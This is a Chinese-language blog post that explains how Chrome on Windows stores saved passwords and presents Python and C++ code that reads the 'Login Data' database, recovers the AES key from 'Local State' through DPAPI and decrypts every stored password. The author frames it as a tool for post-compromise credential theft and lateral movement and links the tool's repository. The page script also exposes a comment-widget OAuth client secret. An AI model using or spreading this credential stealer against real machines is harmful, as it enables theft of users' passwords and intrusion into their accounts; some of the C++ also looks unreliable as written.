

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;dark&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/kd.png">
  <link rel="icon" href="/img/kd.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
  <title>使用c++抓取Chrome所有版本密码 - SD</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"sd-xd.github.io","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>blog of SD</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="使用c++抓取Chrome所有版本密码">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-06-20 19:47" pubdate>
        2021年6月20日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.9k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      24
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">使用c++抓取Chrome所有版本密码</h1>
            
            <div class="markdown-body">
              <p>工具已上传到github:<a target="_blank" rel="noopener" href="https://github.com/SD-XD/Catch-Browser">https://github.com/SD-XD/Catch-Browser</a></p>
<h2 id="谷歌浏览器存储密码的方式"><a href="#谷歌浏览器存储密码的方式" class="headerlink" title="谷歌浏览器存储密码的方式"></a>谷歌浏览器存储密码的方式</h2><p>在使用谷歌浏览器时,如果我们输入某个网站的账号密码,他会自动问我们是否要保存密码,以便下次登录的时候自动填写账号和密码<br><img src="/img/CatchChrome/1.png" srcset="/img/loading.gif" lazyload></p>
<p>在设置中可以找到登录账户和密码</p>
<p><img src="/img/CatchChrome/2.png" srcset="/img/loading.gif" lazyload></p>
<p>也可以直接看密码,不过需要凭证</p>
<p><img src="/img/CatchChrome/3.png" srcset="/img/loading.gif" lazyload></p>
<p>这其实是windows的DPAPI机制</p>
<h2 id="DPAPI"><a href="#DPAPI" class="headerlink" title="DPAPI"></a>DPAPI</h2><p>Data Protection Application Programming Interface(数据保护API)</p>
<p>DPAPI是Windows系统级对数据进行加解密的一种接口无需自实现加解密代码微软已经提供了经过验证的高质量加解密算法提供了用户态的接口对密钥的推导存储数据加解密实现透明并提供较高的安全保证</p>
<p>DPAPI提供了两个用户态接口<code>CryptProtectData</code>加密数据<code>CryptUnprotectData</code>解密数据加密后的数据由应用程序负责安全存储应用无需解析加密后的数据格式。但是加密后的数据存储需要一定的机制因为该数据可以被其他任何进程用来解密当然<code>CryptProtectData</code>也提供了用户输入额外数据来参与对用户数据进行加密的参数但依然无法放于暴力破解。</p>
<p>微软提供了两个接口用来加密和解密,<code>CryptProtectMemory</code>和<code>CryptUnprotectMemory</code></p>
<p>实际上,在老版本(80之前)的谷歌浏览器,仅仅是使用了<code>CryptProtectMemory</code>来对密码进行加密</p>
<h2 id="80版本之前的Chrome"><a href="#80版本之前的Chrome" class="headerlink" title="80版本之前的Chrome"></a>80版本之前的Chrome</h2><h3 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h3><ul>
<li>win7</li>
<li>Chrome版本 79.0.3945.117</li>
</ul>
<h3 id="实验过程"><a href="#实验过程" class="headerlink" title="实验过程"></a>实验过程</h3><p>chrome的密码经过加密后存储在</p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs taggerscript"><span class="hljs-variable">%LocalAppData%</span><span class="hljs-symbol">\G</span>oogle<span class="hljs-symbol">\C</span>hrome<span class="hljs-symbol">\U</span>ser Data<span class="hljs-symbol">\D</span>efault<span class="hljs-symbol">\L</span>ogin Data<br></code></pre></td></tr></table></figure>

<p>如果用二进制文本编辑器查看的化会发现他其实是一个sqlite数据库文件</p>
<p><img src="/img/CatchChrome/4.png" srcset="/img/loading.gif" lazyload></p>
<p>可以使用工具SQLiteStudio打开他</p>
<p>双击logins</p>
<p><img src="/img/CatchChrome/5.png" srcset="/img/loading.gif" lazyload></p>
<p>选择data<br><img src="/img/CatchChrome/6.png" srcset="/img/loading.gif" lazyload></p>
<p>可以看到有用户名和网址,却没有密码</p>
<p>但是密码的二进制实际是有值的</p>
<p><img src="/img/CatchChrome/7.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="编写脚本解密"><a href="#编写脚本解密" class="headerlink" title="编写脚本解密"></a>编写脚本解密</h3><p>python的解密是最简洁的，这里送上一个三好学生的代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> os <span class="hljs-keyword">import</span> getenv<br><span class="hljs-keyword">import</span> sqlite3<br><span class="hljs-keyword">import</span> win32crypt<br><span class="hljs-keyword">import</span> binascii<br>conn = sqlite3.connect(getenv(<span class="hljs-string">&quot;APPDATA&quot;</span>) + <span class="hljs-string">&quot;\..\Local\Google\Chrome\User Data\Default\Login Data&quot;</span>)<br>cursor = conn.cursor()<br>cursor.execute(<span class="hljs-string">&#x27;SELECT action_url, username_value, password_value FROM logins&#x27;</span>)<br><span class="hljs-keyword">for</span> result <span class="hljs-keyword">in</span> cursor.fetchall():<br>    password = win32crypt.CryptUnprotectData(result[<span class="hljs-number">2</span>], <span class="hljs-literal">None</span>, <span class="hljs-literal">None</span>, <span class="hljs-literal">None</span>, <span class="hljs-number">0</span>)[<span class="hljs-number">1</span>]<br>    <span class="hljs-keyword">if</span> password:<br>        <span class="hljs-built_in">print</span> <span class="hljs-string">&#x27;Site: &#x27;</span> + result[<span class="hljs-number">0</span>]<br>        <span class="hljs-built_in">print</span> <span class="hljs-string">&#x27;Username: &#x27;</span> + result[<span class="hljs-number">1</span>]<br>        <span class="hljs-built_in">print</span> <span class="hljs-string">&#x27;Password: &#x27;</span> + password<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-built_in">print</span> <span class="hljs-string">&quot;no password found&quot;</span><br></code></pre></td></tr></table></figure>

<p>但我还是想c++写一个</p>
<p>编写之前,需要配置sqlite3环境,并且下载<code>&lt;sqlite3.h&gt;</code>和<code>&lt;sqlite3.c&gt;</code>文件</p>
<p>如果当前用户正在使用谷歌,是无法打开数据库的,于是我们可以复制一份出来操作</p>
<p><img src="/img/CatchChrome/8.png" srcset="/img/loading.gif" lazyload></p>
<p>再通过sql语句查找logins表</p>
<p><img src="/img/CatchChrome/9.png" srcset="/img/loading.gif" lazyload></p>
<p>在回调函数中解密</p>
<p><img src="/img/CatchChrome/10.png" srcset="/img/loading.gif" lazyload></p>
<p>看下效果,完美解出密码</p>
<p><img src="/img/CatchChrome/11.png" srcset="/img/loading.gif" lazyload></p>
<p>与谷歌浏览器上面看到的也是一样的,无需再验证用户密码</p>
<p><img src="/img/CatchChrome/12.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="80版本之后的Chrome"><a href="#80版本之后的Chrome" class="headerlink" title="80版本之后的Chrome"></a>80版本之后的Chrome</h2><p>那么80.x之后的Chrome如何解密呢</p>
<h3 id="实验环境-1"><a href="#实验环境-1" class="headerlink" title="实验环境"></a>实验环境</h3><ul>
<li>win10</li>
<li>Chrome版本 91.0.4472.101(最新版)</li>
</ul>
<h3 id="实验分析"><a href="#实验分析" class="headerlink" title="实验分析"></a>实验分析</h3><p>先看一下跟以前版本的Chrome存储方式上有什么区别</p>
<p><img src="/img/CatchChrome/13.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/img/CatchChrome/14.png" srcset="/img/loading.gif" lazyload></p>
<p>判断是否是新版本的Chrome加密其实就是看它加密后值的前面有没有v10或者v11</p>
<p>看官方文档,分析新版加密算法</p>
<p>key的初始化<br><a target="_blank" rel="noopener" href="https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_win.cc;l=192;drc=f59fc2f1cf0efae49ea96f9070bead4991f53fea">https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_win.cc;l=192;drc=f59fc2f1cf0efae49ea96f9070bead4991f53fea</a></p>
<p><img src="/img/CatchChrome/15.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/img/CatchChrome/16.png" srcset="/img/loading.gif" lazyload><br>注释:尝试从local state提取密钥。</p>
<p>并且可以看到<code>kDPAPIKeyPrefix</code>实际上就是一个字符串”DPAPI”</p>
<p><img src="/img/CatchChrome/17.png" srcset="/img/loading.gif" lazyload></p>
<p>然后就是进行DPAPI的解密,最后就是如果key不在local state中或者DPAPI解密失败,就重新生成一个key</p>
<p>从这里我们我可以大致分析出key初始化时的动作:</p>
<ol>
<li>从local state文件中提取key</li>
<li>base64解密key</li>
<li>去除key开头的“DPAPI”</li>
<li>DPAPI解密,得到最终的key</li>
</ol>
<p>跟进<code>GetString</code>函数的参数<code>kOsCryptEncryptedKeyPrefName</code></p>
<p><img src="/img/CatchChrome/18.png" srcset="/img/loading.gif" lazyload></p>
<p>知道key存放在local state文件os_crypt.encrypted_key字段中,即</p>
<p><img src="/img/CatchChrome/19.png" srcset="/img/loading.gif" lazyload></p>
<p>而local state文件就在本地默认目录:</p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs taggerscript"><span class="hljs-variable">%LocalAppData%</span><span class="hljs-symbol">\G</span>oogle<span class="hljs-symbol">\C</span>hrome<span class="hljs-symbol">\U</span>ser Data<span class="hljs-symbol">\L</span>ocal State<br></code></pre></td></tr></table></figure>
<p>Local State是一个JSON格式的文件</p>
<h3 id="明文加密方式"><a href="#明文加密方式" class="headerlink" title="明文加密方式"></a>明文加密方式</h3><p>看源码注释</p>
<p><img src="/img/CatchChrome/20.png" srcset="/img/loading.gif" lazyload></p>
<p>密钥加密后数据前缀是“v10”</p>
<p><img src="/img/CatchChrome/21.png" srcset="/img/loading.gif" lazyload></p>
<p>密钥和NONCE/IV的长度分别为：32字节和12字节</p>
<p><img src="/img/CatchChrome/22.png" srcset="/img/loading.gif" lazyload></p>
<p>这里解释一下NONCE/IV是什么:</p>
<p>如果我们不希望相同的明文通过密钥加密出来的密文是相同的(这样很容易让攻击者知道这两条密文的明文是相同的) 解决办法是使用IV（初始向量）或nonce（只使用一次的数值）。因为对于每条加密消息，我们都可以使用不同的byte字符串。它们是非确定理论的起源，而这种理论要求制造出令人难以分辨的副本。这些消息通常不是什么秘密，但为了解密需要，我们会在分发时对它们进行加密。 IV与nonce之间的区别是有争议的，但也不是没有关联的。不同的加密方案所保护的侧重点也不同：有些方案需要的只是密文不重复，这种情况我们通常叫作nonce；还有一些方案需要密文是随机的，甚至完全不可预测的，这种情况我们通常叫作IV。这里其实就是希望即便明文相同,经过加密后的密文也不相同。</p>
<p>再往下翻,其实可以看到解密函数</p>
<p><img src="/img/CatchChrome/23.png" srcset="/img/loading.gif" lazyload></p>
<p><code>encrypted_value</code>的前缀v10后为12字节的NONCE（IV），然后再是真正的密文。Chrome使用的是AES-256-GCM的AEAD对称加密、</p>
<p>那么思路就清晰了,这里我自己画了一个图来总结算法</p>
<p><img src="/img/CatchChrome/24.png" srcset="/img/loading.gif" lazyload></p>
<p>实现自动化抓密码<br>解密使用一个非常强大的库,cryptopp</p>
<p>先获取原始的key</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-function">string <span class="hljs-title">GetOriginalkey</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>    string Decoded = <span class="hljs-string">&quot;&quot;</span>;<br>    <span class="hljs-comment">//获取Local State中的未解密的key</span><br>    string key = <span class="hljs-string">&quot;RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADWXmStECIlTZZxWMAYf5UmAAAAAAIAAAAAABBmAAAAAQAAIAAAAP8V1h3J1qhEf8/h13hre+e3EMW0oD41Ux7UrEqls4DoAAAAAA6AAAAAAgAAIAAAAA7xXGgN1Hks1TbInimvYa0TnMfPa0jPpmlI9BDiUQAAMAAAAPzO7wya37iu97rDB4UTtn5QwQcuJkw2E3cw/tHuSnHdNv4qwXMWLC2oU3TkysoXmUAAAAAtPkLwNaInulyoGNH4GDxlwbzAW4DP7T8XWsZ/2QB0YrcLqxSNytHlV1qvVyO8D20Eu7jKqD/bMW2MzwEa40iF&quot;</span>;<br>    <span class="hljs-built_in">StringSource</span>((BYTE*)key.<span class="hljs-built_in">c_str</span>(), key.<span class="hljs-built_in">size</span>(), <span class="hljs-literal">true</span>, <span class="hljs-keyword">new</span> <span class="hljs-built_in">Base64Decoder</span>(<span class="hljs-keyword">new</span> <span class="hljs-built_in">StringSink</span>(Decoded)));<br>    key = Decoded;<br>    key = key.<span class="hljs-built_in">substr</span>(<span class="hljs-number">5</span>);<span class="hljs-comment">//去除首位5个字符DPAPI</span><br>    Decoded.<span class="hljs-built_in">clear</span>();<span class="hljs-comment">//DPAPI解密</span><br>    <span class="hljs-keyword">int</span> i;<br>    <span class="hljs-keyword">char</span> result[<span class="hljs-number">1000</span>] = <span class="hljs-string">&quot;&quot;</span>;<br>    DATA_BLOB DataOut = &#123; <span class="hljs-number">0</span> &#125;;<br>    DATA_BLOB DataVerify = &#123; <span class="hljs-number">0</span> &#125;;<br>    DataOut.pbData = (BYTE*)key.<span class="hljs-built_in">c_str</span>();<br>    DataOut.cbData = <span class="hljs-number">1000</span>;<br>    <span class="hljs-keyword">if</span> (!<span class="hljs-built_in">CryptUnprotectData</span>(&amp;DataOut, <span class="hljs-literal">nullptr</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>, &amp;DataVerify)) &#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[!] Decryption failure: %d\n&quot;</span>, <span class="hljs-built_in">GetLastError</span>());<br>    &#125;<br>    <span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[+] Decryption successfully!\n&quot;</span>);<br>        <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i &lt; DataVerify.cbData; i++)<br>        &#123;<br>            result[i] = DataVerify.pbData[i];<br>        &#125;<br>    &#125;<br>    <span class="hljs-keyword">return</span> result;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>如果当前chrome版本并不是80+,可以通过一个简单的判断:就是看加密密码前有没有”v10“或者”v11“</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs c++">string e_str = argv[<span class="hljs-number">2</span>];<br><span class="hljs-comment">//判断密文是否包含v10或v11,如果包含则说明是80+的Chrome,用新的解密方法</span><br><span class="hljs-keyword">if</span> (<span class="hljs-built_in">strstr</span>(e_str.<span class="hljs-built_in">c_str</span>(), <span class="hljs-string">&quot;v10&quot;</span>) != <span class="hljs-literal">NULL</span> || <span class="hljs-built_in">strstr</span>(e_str.<span class="hljs-built_in">c_str</span>(), <span class="hljs-string">&quot;v11&quot;</span>) != <span class="hljs-literal">NULL</span>)<br>&#123;<br>    <span class="hljs-built_in">NewDecrypt</span>(argc, argv, azColName);<br>&#125;<br><span class="hljs-keyword">else</span> &#123;<br>    <span class="hljs-built_in">DecryptoByDPAPI</span>(argv, azColName);<br>&#125;<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br></code></pre></td></tr></table></figure>

<p>然后就是解密密文</p>
<p>获取iv和密文</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">//argv[2]是password_value的值</span><br>chiper = argv[<span class="hljs-number">2</span>];<br>iv = argv[<span class="hljs-number">2</span>];<br>iv = iv.<span class="hljs-built_in">substr</span>(<span class="hljs-number">3</span>, <span class="hljs-number">15</span>);  <span class="hljs-comment">//获取iv的值</span><br>chiper = chiper.<span class="hljs-built_in">substr</span>(<span class="hljs-number">15</span>);   <span class="hljs-comment">//加密密码的值</span><br></code></pre></td></tr></table></figure>
<p>再用<code>cyptopp</code>强大的库函数进行解密</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">//获取iv hex编码值</span><br><span class="hljs-built_in">StringSource</span>((BYTE*)iv.<span class="hljs-built_in">c_str</span>(), iv.<span class="hljs-built_in">size</span>(), <span class="hljs-literal">true</span>, <span class="hljs-keyword">new</span> <span class="hljs-built_in">HexEncoder</span>(<span class="hljs-keyword">new</span> <span class="hljs-built_in">StringSink</span>(Encoded)));<br>iv = Encoded;<br>Encoded.<span class="hljs-built_in">clear</span>();<br>iv = iv.<span class="hljs-built_in">substr</span>(<span class="hljs-number">0</span>, iv.<span class="hljs-built_in">size</span>() - <span class="hljs-number">6</span>);<br>CHAR Pass_Word[<span class="hljs-number">1000</span>] = &#123; <span class="hljs-number">0</span> &#125;;<br><span class="hljs-built_in">StringSource</span>((BYTE*)iv.<span class="hljs-built_in">c_str</span>(), iv.<span class="hljs-built_in">size</span>(), <span class="hljs-literal">true</span>,<span class="hljs-keyword">new</span> <span class="hljs-built_in">HexDecoder</span>(<span class="hljs-keyword">new</span> <span class="hljs-built_in">StringSink</span>(Decoded))); <br>iv = Decoded;<br>Decoded.<span class="hljs-built_in">clear</span>();<br><span class="hljs-keyword">char</span>* key = <span class="hljs-built_in">GetOriginalkey</span>();<br>d.<span class="hljs-built_in">SetKeyWithIV</span>((BYTE*)key, <span class="hljs-number">32</span>, (BYTE*)iv.<span class="hljs-built_in">c_str</span>(), iv.<span class="hljs-built_in">size</span>());<br><br><span class="hljs-built_in">StringSource</span>(chiper, <span class="hljs-literal">true</span>,<span class="hljs-keyword">new</span> <span class="hljs-built_in">AuthenticatedDecryptionFilter</span>(d,<span class="hljs-keyword">new</span> <span class="hljs-built_in">StringSink</span>(password)));<br><span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; password.<span class="hljs-built_in">size</span>(); i++)<br>&#123;<br>    Pass_Word[i] = password[i];<br>&#125;<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%s = %s\n&quot;</span>, azColName[<span class="hljs-number">0</span>], argv[<span class="hljs-number">0</span>] ? argv[<span class="hljs-number">0</span>] : <span class="hljs-string">&quot;NULL&quot;</span>);<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%s = %s\n&quot;</span>, azColName[<span class="hljs-number">1</span>], argv[<span class="hljs-number">1</span>] ? argv[<span class="hljs-number">1</span>] : <span class="hljs-string">&quot;NULL&quot;</span>);<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%s = %s\n&quot;</span>, azColName[<span class="hljs-number">2</span>], Pass_Word);<br></code></pre></td></tr></table></figure>
<p>这里逻辑的话参照上面分析步骤,这里就不再赘述</p>
<p>最后看看解密效果<br><img src="/img/CatchChrome/25.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/img/CatchChrome/26.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>实战中如果拿到一台主机,并且安装有chrome,我们就可以抓取密码以便快速精确地横向。</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/06/21/RemoteCmd/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">socket之shell实现</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/06/20/psexec/">
                        <span class="hidden-mobile">psexec原理分析</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="gitalk-container"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#gitalk-container', function() {
      Fluid.utils.createCssLink('/css/gitalk.css')
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.min.js', function() {
        var options = Object.assign(
          {"clientID":"d3fed93d8ca9dd026b6a","clientSecret":"b3ebb466a8206df623c10df13110073b40137bdb","repo":"SD-XD.github.io","owner":"SD-XD","admin":["SD-XD"],"language":"zh-CN","labels":["Gitalk"],"perPage":10,"pagerDirection":"last","distractionFreeMode":false,"createIssueManually":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token"},
          {
            id: '4e260a88e0f7c7b73e555e1c0197fb07'
          }
        )
        var gitalk = new Gitalk(options);
        gitalk.render('gitalk-container');
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



